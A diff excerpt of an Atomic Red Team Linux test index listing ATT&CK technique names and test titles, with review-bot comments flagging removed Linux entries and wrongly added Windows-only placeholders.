- - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
+- T1547.003 Time Providers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #2: Create a user account on a FreeBSD system [linux]
- Atomic Test #6: Create a new user in Linux with `root` UID and GID. [linux]
- Atomic Test #7: Create a new user in FreeBSD with `root` GID. [linux]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
+- T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.012 Event Triggered Execution: Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.008 Event Triggered Execution: Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #4: Active Directory Create Admin Account [linux]
- Atomic Test #5: Active Directory Create User Account (Non-elevated) [linux]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.001 Office Application Startup: Office Template Macros. [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.009 Event Triggered Execution: AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.001 Event Triggered Execution: Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
-- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- - Atomic Test #1: Create Systemd Service and Timer [linux]
- - Atomic Test #2: Create a user level transient systemd service and timer [linux]
- - Atomic Test #3: Create a system level transient systemd service and timer [linux]
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- - Atomic Test #1: Add command to .bash_profile [macos, linux]
- - Atomic Test #2: Add command to .bashrc [macos, linux]
- - Atomic Test #3: Add command to .shrc [linux]
- - Atomic Test #4: Append to the system shell profile [linux]
- - Atomic Test #5: Append commands user shell profile [linux]
- - Atomic Test #6: System shell profile scripts [linux]
- - Atomic Test #7: Create/Append to .bash_logout [linux]
+- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.015 Event Triggered Execution: Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.004 Office Application Startup: Outlook Home Page [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.010 Event Triggered Execution: AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.002 Event Triggered Execution: Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- - Atomic Test #2: rc.common [linux]
- - Atomic Test #3: rc.local [linux]
-- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- - Atomic Test #1: Create Systemd Service [linux]
- - Atomic Test #2: Create SysV Service [linux]
- - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.002 Hijack Execution Flow: DLL Side-Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1098.002 Account Manipulation: Additional Email Delegate Permissions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1653 Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1137.002 Office Application Startup: Office Test [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1547.008 Boot or Logon Autostart Execution: LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1546.007 Event Triggered Execution: Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
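Review bot: existing Linux tests are removed from this section while Windows-only placeholders are added. The `-` lines drop T1546.005 Trap (4 tests), T1574.006 LD_PRELOAD (2), T1098.004 SSH Authorized Keys (1), T1547.006 Kernel Modules and Extensions (1), T1053.006 Systemd Timers (3), T1546.004 .bash_profile .bashrc and .shrc (7), T1037.004 Rc.common (2), T1543.002 SysV/Systemd Service (3) and the T1547.013 XDG Autostart Entries placeholder, all of which are Linux persistence techniques, and the `+` lines add CONTRIBUTE A TEST entries for techniques whose names mark them as Windows-specific (Winlogon Helper DLL, Image File Execution Options Injection, AppCert DLLs, AppInit DLLs, Registry Run Keys / Startup Folder, Authentication Package, LSASS Driver, BITS Jobs, IIS Components). Every test in this file is tagged [linux] or [macos, linux], so please confirm the index generator was run with the intended platform filter: a CONTRIBUTE A TEST link for a Windows-only technique in this index invites contributions that cannot carry a [linux] tag, and the removed entries are a regression unless they reappear elsewhere in the new file, which this diff does not show.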
@@ -322,6 +474,7 @@
- Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
- Atomic Test #11: Login as nobody (Linux) [linux]
- Atomic Test #12: Login as nobody (freebsd) [linux]
+- T1574.012 Hijack Execution Flow: COR_PROFILER [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
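Review bot: T1574.012 Hijack Execution Flow: COR_PROFILER is a .NET CLR profiler technique that ATT&CK scopes to Windows, so a CONTRIBUTE A TEST placeholder for it does not belong in an index whose tests are all tagged [linux] or [macos, linux]; suggest dropping this line or applying the same platform filter to placeholders that is applied to the test entries.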
@@ -330,6 +483,7 @@
- Atomic Test #2: Base64 Encoded data (freebsd) [linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1071.005 Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -357,7 +511,7 @@
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -401,12 +555,14 @@
- Atomic Test #5: Bash session based keylogger [linux]
- Atomic Test #6: SSHD PAM keylogger [linux]
- Atomic Test #7: Auditd keylogger [linux]
+- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
+- T1114.001 Email Collection: Local Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
@@ -419,120 +575,42 @@
- Atomic Test #3: Compressing data using zipfile in Python (FreeBSD/Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (FreeBSD/Linux) [linux]
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1557.001 Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1114.002 Email Collection: Remote Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1056.004 Input Capture: Credential API Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1021.004 Remote Services: SSH](../../T1021.004/T1021.004.md)
- - Atomic Test #1: ESXi - Enable SSH via PowerCLI [linux]
-- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.002 Remote Services: SMB/Windows Admin Shares [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.006 Remote Services: Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.003 Remote Services: Distributed Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# privilege-escalation
-- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- - Atomic Test #1: Sudo usage [macos, linux]
- - Atomic Test #2: Sudo usage (freebsd) [linux]
- - Atomic Test #3: Unlimited sudo cache timeout [macos, linux]
- - Atomic Test #4: Unlimited sudo cache timeout (freebsd) [linux]
- - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux]
- - Atomic Test #6: Disable tty_tickets for sudo caching (freebsd) [linux]
-- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
- - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux]
- - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- - Atomic Test #1: Trap EXIT [macos, linux]
- - Atomic Test #2: Trap EXIT (freebsd) [linux]
- - Atomic Test #3: Trap SIGINT [macos, linux]
- - Atomic Test #4: Trap SIGINT (freebsd) [linux]
-- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- - Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- - Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
-- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- - Atomic Test #1: Make and modify binary from C source [macos, linux]
- - Atomic Test #2: Make and modify binary from C source (freebsd) [linux]
- - Atomic Test #3: Set a SetUID flag on file [macos, linux]
- - Atomic Test #4: Set a SetUID flag on file (freebsd) [linux]
- - Atomic Test #5: Set a SetGID flag on file [macos, linux]
- - Atomic Test #6: Set a SetGID flag on file (freebsd) [linux]
- - Atomic Test #7: Make and modify capabilities of a binary [linux]
- - Atomic Test #8: Provide the SetUID capability to a file [linux]
- - Atomic Test #9: Do reconnaissance for files that have the setuid bit set [linux]
- - Atomic Test #10: Do reconnaissance for files that have the setgid bit set [linux]
-- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
-- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- - Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
-- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- - Atomic Test #1: Create Systemd Service and Timer [linux]
- - Atomic Test #2: Create a user level transient systemd service and timer [linux]
- - Atomic Test #3: Create a system level transient systemd service and timer [linux]
-- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md)
- - Atomic Test #1: Add command to .bash_profile [macos, linux]
- - Atomic Test #2: Add command to .bashrc [macos, linux]
- - Atomic Test #3: Add command to .shrc [linux]
- - Atomic Test #4: Append to the system shell profile [linux]
- - Atomic Test #5: Append commands user shell profile [linux]
- - Atomic Test #6: System shell profile scripts [linux]
- - Atomic Test #7: Create/Append to .bash_logout [linux]
-- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- - Atomic Test #2: rc.common [linux]
- - Atomic Test #3: rc.local [linux]
-- [T1543.002 Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md)
- - Atomic Test #1: Create Systemd Service [linux]
- - Atomic Test #2: Create SysV Service [linux]
- - Atomic Test #3: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
-- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- - Atomic Test #2: At - Schedule a job [linux]
-- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- - Atomic Test #8: Create local account (Linux) [linux]
- - Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- - Atomic Test #10: Reactivate a locked/expired account (FreeBSD) [linux]
- - Atomic Test #11: Login as nobody (Linux) [linux]
- - Atomic Test #12: Login as nobody (freebsd) [linux]
+- T1563.002 Remote Service Session Hijacking: RDP Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.002 Use Alternate Authentication Material: Pass the Hash [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1021.001 Remote Services: Remote Desktop Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# credential-access
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- - Atomic Test #1: Malicious PAM rule [linux]
- - Atomic Test #2: Malicious PAM rule (freebsd) [linux]
- - Atomic Test #3: Malicious PAM module [linux]
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
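Review bot: the entire `# privilege-escalation` section is deleted in this hunk, heading included, taking with it existing Linux tests for T1548.003 Sudo and Sudo Caching (6 tests), T1548.001 Setuid and Setgid (10), T1053.003 Cron (4) and T1078.003 Local Accounts (5), plus the Linux-relevant placeholders T1055.008 Ptrace System Calls, T1055.009 Proc Memory, T1055.014 VDSO Hijacking and T1611 Escape to Host. Nothing in this diff re-adds them, so either the generator now emits that tactic elsewhere in the file (please point to where) or this is a regression that should block the merge. In the same hunk T1021.004 Remote Services: SSH with its [linux] ESXi test and the T1563.001 SSH Hijacking placeholder are dropped from lateral-movement, and T1556.003 Pluggable Authentication Modules with its three [linux] PAM tests is dropped from credential-access, while the additions are Windows-scoped lateral-movement techniques (SMB/Windows Admin Shares, Windows Remote Management, Distributed Component Object Model, Pass the Hash, Pass the Ticket, RDP Hijacking, Remote Desktop Protocol) that will never carry a [linux] test.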
@@ -546,13 +624,10 @@
- Atomic Test #7: SUDO Brute Force - FreeBSD [linux]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1003.007 OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md)
- - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
- - Atomic Test #2: Dump individual process memory with sh on FreeBSD (Local) [linux]
- - Atomic Test #3: Dump individual process memory with Python (Local) [linux]
- - Atomic Test #4: Capture Passwords with MimiPenguin [linux]
+- T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1606.002 Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
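Review bot: T1003.007 OS Credential Dumping: Proc Filesystem is removed along with its four [linux] tests (process memory dumps with sh and Python, MimiPenguin), which is a real loss for a Linux index, and the lines it is replaced by, T1003.002 Security Account Manager and T1003.004 LSA Secrets, are Windows registry-hive techniques that cannot get a [linux] test. Dropping the T1555.002 Securityd Memory placeholder also removes a macOS entry while [macos, linux] tests are kept elsewhere in the file, so the platform filter applied here looks inconsistent; please restore the Proc Filesystem block.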
@@ -563,10 +638,14 @@
- Atomic Test #13: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
- Atomic Test #14: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
- Atomic Test #15: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
+- T1552.002 Unsecured Credentials: Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1558.004 Steal or Forge Kerberos Tickets: AS-REP Roasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552 Unsecured Credentials](../../T1552/T1552.md)
- Atomic Test #1: AWS - Retrieve EC2 Password Data using stratus [linux, macos, iaas:aws]
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md)
